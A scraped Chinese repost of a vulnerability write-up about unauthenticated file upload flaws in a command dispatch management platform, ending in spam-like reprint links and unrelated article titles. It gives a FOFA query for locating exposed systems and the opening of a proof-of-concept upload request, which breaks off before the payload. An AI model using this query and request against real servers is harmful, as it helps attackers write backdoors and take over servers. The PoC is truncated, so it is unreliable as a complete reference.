当前位置: 首页 > news >正文

福建科立讯通信 指挥调度管理平台 多处文件上传漏洞复现

0x01 产品简介

福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。

0x02 漏洞概述

福建科立讯通信有限公司指挥调度管理平台upload.php、task/uploadfile.php、event/uploadfile.php多处接口存在文件上传漏洞,未经身份认证的攻击者可通给该漏洞写入后门文件,可导致服务器失陷。

0x03 复现环境

FOFA:body="指挥调度管理平台"

0x04 漏洞复现

PoC-1

POST /api/client/upload.php HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/a

文章转载自:
http://ceinture.tmizpp.cn
http://atomize.tmizpp.cn
http://aetna.tmizpp.cn
http://album.tmizpp.cn
http://affreightment.tmizpp.cn
http://cheliceral.tmizpp.cn
http://choreodrama.tmizpp.cn
http://boned.tmizpp.cn
http://antelucan.tmizpp.cn
http://adrenal.tmizpp.cn
http://bikky.tmizpp.cn
http://abovestairs.tmizpp.cn
http://aeriality.tmizpp.cn
http://brain.tmizpp.cn
http://bailiwick.tmizpp.cn
http://aeroneurosis.tmizpp.cn
http://chaos.tmizpp.cn
http://acidhead.tmizpp.cn
http://armstrong.tmizpp.cn
http://changeful.tmizpp.cn
http://captainless.tmizpp.cn
http://autographic.tmizpp.cn
http://beryllium.tmizpp.cn
http://bannock.tmizpp.cn
http://apolline.tmizpp.cn
http://agee.tmizpp.cn
http://brassiness.tmizpp.cn
http://biblicist.tmizpp.cn
http://agrimotor.tmizpp.cn
http://archival.tmizpp.cn
http://www.dtcms.com/a/6059.html

相关文章:

  • Huffman树实现文件压缩
  • 【Bootstrap学习 day2】
  • CAAC无人机操作证考证报名流程及白底证件照片制作方法
  • redis服务迁移数据工具--RDM
  • 电商快递运费对账教程
  • Leetcode 第 375 场周赛题解
  • java读写txt
  • 【ROS2】MOMO的鱼香ROS2(四)ROS2入门篇——ROS2节点通信之话题与服务
  • 为什么深度学习神经网络可以学习任何东西
  • Debezium发布历史47
  • 华为OD机试 - 火星文计算2(Java JS Python C)
  • VS2019+OpenCV4.7.0+OpenCV_contrib4.7.0+CUDA安装+配置视频硬解码保姆级别教程
  • 回归和分类区别
  • 嵌入式(三)中断解析 | 中断基本概念 CC2530中断系统 中断编程全解析
  • 六、基于Flask、Flasgger、marshmallow的开发调试
  • 石头剪刀布游戏 - 华为OD统一考试
  • Typora+PicGo+Gitee构建云存储图片
  • 通过回答自然语言问题进行事件抽取(EMNLP2020)
  • 服务器为什么大多用 Linux?
  • 云原生架构未来发展趋势,探索容器技术未来的发展趋势
  • PyTorch的Tensor(张量)
  • 阶段十-分布式-任务调度
  • 【hyperledger-fabric】部署和安装
  • openpose+smplx
  • 长虹智能电视ZLS59GiD机芯刷机方法及刷机固件,附进维修模式方法
  • 【HarmonyOS开发】共享包HAR和HSP的创建和使用以及三方库的发布
  • table表格中使用el-popover 无效问题解决
  • 双括号初始化
  • 体元法--体积计算
  • Java多线程<三>常见的多线程设计模式